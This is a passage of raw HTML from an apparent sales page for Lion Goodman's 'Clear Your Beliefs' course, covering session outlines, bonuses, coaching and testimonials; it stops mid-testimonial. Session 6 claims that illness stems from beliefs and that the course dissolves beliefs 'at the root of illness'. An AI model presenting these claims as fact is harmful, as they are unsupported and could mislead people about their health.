productivity\r\n\r\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<h1>A Message from Lion Goodman...</h1>\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\r\n<p>Dear Explorer:</p>\r\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\r\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\r\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\r\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\r\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\r\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\r\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\r\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\r\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\r\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\r\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\r\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\r\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\r\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\r\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\r\n<p>In gratitude, and with warm wishes for your total success,</p>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\r\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\r\n\r\n<p>&nbsp;</p>\r\n<h1>Register Today and Discover What''s Possible</h1>\r\n\r\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\r\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\r\n\r\n<p><strong> In Session 1, you will:</strong></p>\r\n\r\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\r\nLearn which ones keep you stuck, preventing you from having what you want in life\r\nExperience a process that returns you to your True Self, the home of inner joy and bliss\r\nBegin to work with, not against, your subconscious mind – where your beliefs reside\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\r\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\r\n\r\n<p><strong> In Session 2, you will:</strong></p>\r\n\r\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\r\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\r\nSee your own magnificence through a new clear lens of your own beauty and joy\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\r\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\r\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\r\n\r\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\r\n\r\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\r\n\r\n<p><strong> In Session 3, you will:</strong></p>\r\n\r\nIdentify old beliefs that stand between you and creating the life you want\r\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\r\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\r\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\r\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<p><strong> In Session 4, you will:</strong></p>\r\n\r\nLook deeply into the childhood patterns that enabled you to survive and thrive\r\nSee which of your beliefs now interfere with your intimate relationships\r\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\r\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\r\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\r\n\r\n<p><strong> In Session 5, you will:</strong></p>\r\n\r\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\r\nRemove beliefs that create stumbling blocks in the way of natural abundance\r\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\r\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\r\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\r\n\r\n<p><strong> In Session 6, you will:</strong></p>\r\n\r\nIdentify old beliefs that stand between you and vibrant health\r\nRecognize beliefs that make you vulnerable to disease and injury\r\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\r\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\r\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\r\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\r\n\r\n<p><strong> In Session 7, you will:</strong></p>\r\n\r\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\r\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\r\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\r\n\r\n<p></p>\r\n<p>&nbsp;</p>\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\r\n<p>&nbsp;</p>\r\n\r\nBonus #1:  <strong>Love:  What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\r\n\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\r\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\r\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\r\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\r\n\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\nBonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong>\r\n\r\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\r\n\r\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\r\n\r\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\r\n\r\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\r\n\r\nBe called to awaken your already-powerful ability to create the life of your dreams\r\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\r\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\r\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\r\nLearn a process that can strengthen your power of intention\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\nBonus #5:<strong> Change Your Beliefs eBook</strong>\r\n\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\r\n\r\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\r\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\r\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\r\n\r\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\nBonus #6: <strong>Complete Transcripts of the Course</strong>\r\n\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\r\n\r\n<p>&nbsp;</p>\r\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\r\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\r\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\r\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\r\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\r\n<h1 id="package"></h1>\r\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\r\n<p>&nbsp;</p>\r\n\r\n<h1>Purchase Today and You''ll Receive:</h1>\r\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\r\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\r\n<p>	<strong>=&gt; <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\r\n<strong>=&gt; <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\r\n<strong>=&gt; <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\r\n<strong>=&gt; <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\r\n<strong>=&gt; <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\r\n<strong>=&gt; <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\r\n<strong>=&gt; <em>Professional Coaching Sessions:</strong> </em> Optional.</p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<p>&nbsp;</p>\r\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\r\n<p style="text-align: center">OR</p>\r\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\r\n\r\n<p>&nbsp;</p>\r\n\r\n<h1>Satisfaction Guaranteed</h1>\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\r\n<p>&nbsp;</p>\r\n<h1>About Lion Goodman</h1>\r\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\r\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\r\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\r\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n\r\n<h1>Praise for Lion and Clear Your Beliefs</h1>\r\n\r\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\r\n<strong>– G. J., software developer</strong>\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\r\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\r\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\r\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\r\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\r\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\r\n<strong>~ T. L., Healer, Stamford, CT </strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\r\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\r\n\r\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\r\n\r\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\r\n<strong>~ Martha Bear, 